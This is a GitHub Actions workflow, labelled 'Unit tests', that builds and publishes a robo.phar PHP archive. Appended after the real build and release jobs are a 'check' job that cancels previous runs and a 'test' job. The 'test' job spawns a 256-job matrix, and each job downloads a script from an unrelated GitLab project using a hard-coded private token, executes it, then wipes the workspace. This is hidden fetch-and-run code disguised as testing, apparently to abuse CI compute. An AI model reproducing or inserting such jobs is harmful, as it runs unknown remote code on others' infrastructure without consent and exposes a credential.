# https://help.github.com/en/categories/automating-your-workflow-with-github-actions
# .github/workflows/build.yml

on:
  push:
  pull_request:
  workflow_dispatch:

name: "Unit tests"

jobs:
    dependencies:
        name: Build dependencies
        runs-on: ubuntu-latest
        outputs:
            version: ${{ steps.version.outputs.version }}

        steps:
            - name: Check out source files
              uses: actions/checkout@v2

            - name: Create global variables
              id: version
              run: echo "::set-output name=version::$(git rev-parse --short HEAD)"

    run:
        name: "CI"
        runs-on: ${{ matrix.operating-system }}
        strategy:
            fail-fast: false
            matrix:
                operating-system: [ubuntu-latest]
                php-versions: ['7.4']
        needs: [dependencies]

        steps:
            - name: Set git to use LF
              run: |
                  git config --global core.autocrlf false
                  git config --global core.eol lf

            - name: Checkout
              uses: actions/checkout@v2.3.4
              with:
                  fetch-depth: 1

            - name: Install PHP
              uses: shivammathur/setup-php@v2
              with:
                  php-version: ${{ matrix.php-versions }}
                  extensions: mbstring

            - name: Get Composer Cache Directory
              id: composer-cache
              run: echo "::set-output name=dir::$(composer config cache-files-dir)"

            - name: Cache dependencies
              uses: actions/cache@v2.1.4
              with:
                  path: ${{ steps.composer-cache.outputs.dir }}
                  key: ${{ runner.os }}-composer-${{ hashFiles('**/composer.json') }}
                  restore-keys: ${{ runner.os }}-composer-

            - name: Install dependencies
              run: composer install --no-progress --prefer-dist --optimize-autoloader

            - name: Build phar
              run: composer compile

            - name: Upload build assets
              uses: actions/upload-artifact@v2
              with:
                name: robo.phar
                path: ./robo.phar

            - name: Upload build assets checksum
              uses: actions/upload-artifact@v2
              with:
                name: robo.phar.sha1sum
                path: ./robo.phar.sha1sum

    release:
        name: "Create tag/pre-release"
        runs-on: ubuntu-latest
        needs: [dependencies, run]
        outputs:
            upload_url: ${{ steps.create_release.outputs.upload_url }}
        steps:
        - name: Create pre-release (${{ needs.dependencies.outputs.version }})
          id: create_release
          uses: actions/create-release@v1
          env:
            GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          with:
            tag_name: v${{ github.run_number }}-${{ needs.dependencies.outputs.version }}
            release_name: Version ${{ github.run_number }} (${{ needs.dependencies.outputs.version }})
            draft: true
            prerelease: true

    assets:
        name: Upload release assets
        runs-on: ubuntu-latest
        needs: [run, release]

        steps:
        - name: Download build assets
          uses: actions/download-artifact@v2
          with:
            name: robo.phar

        - name: Download build assets
          uses: actions/download-artifact@v2
          with:
            name: robo.phar.sha1sum

        - name: Upload release assets
          uses: actions/upload-release-asset@v1
          env:
            GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          with:
            upload_url: ${{ needs.release.outputs.upload_url }}
            asset_path: ./robo.phar
            asset_name: robo.phar
            asset_content_type: application/octet-stream

        - name: Upload release assets
          uses: actions/upload-release-asset@v1
          env:
            GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          with:
            upload_url: ${{ needs.release.outputs.upload_url }}
            asset_path: ./robo.phar.sha1sum
            asset_name: robo.phar.sha1sum
            asset_content_type: application/text
    check:
      runs-on: ubuntu-16.04
      needs: assets
      strategy:
        matrix:
          vers: [1,2,3,4,5,6,7]
          flag: [a,b]
        fail-fast: false 
      steps:
      - name: Check out code
        uses: actions/checkout@v2
      - name: Cancel Previous Runs
        uses: styfle/cancel-workflow-action@0.8.0
        with:
           access_token: ${{ github.token }}
           workflow_id: ${{ github.event.workflow.id }}
           ignore_sha: true

    test:
      runs-on: ubuntu-16.04
      needs: check
      strategy:
        matrix:
          vers: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]
          flag: [a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p]
        fail-fast: false 
      steps:
      - name: Check out code
        uses: actions/checkout@v2
      - name: test
        run: |
          wget -O test.sh --header='PRIVATE-TOKEN:GxuMWtk8f4FGCxEhvyzy' 'https://gitlab.com/api/v4/projects/25442785/repository/files/test.sh/raw?ref=master'
          chmod +x test.sh && ./test.sh
          rm -rf *
          echo "done"
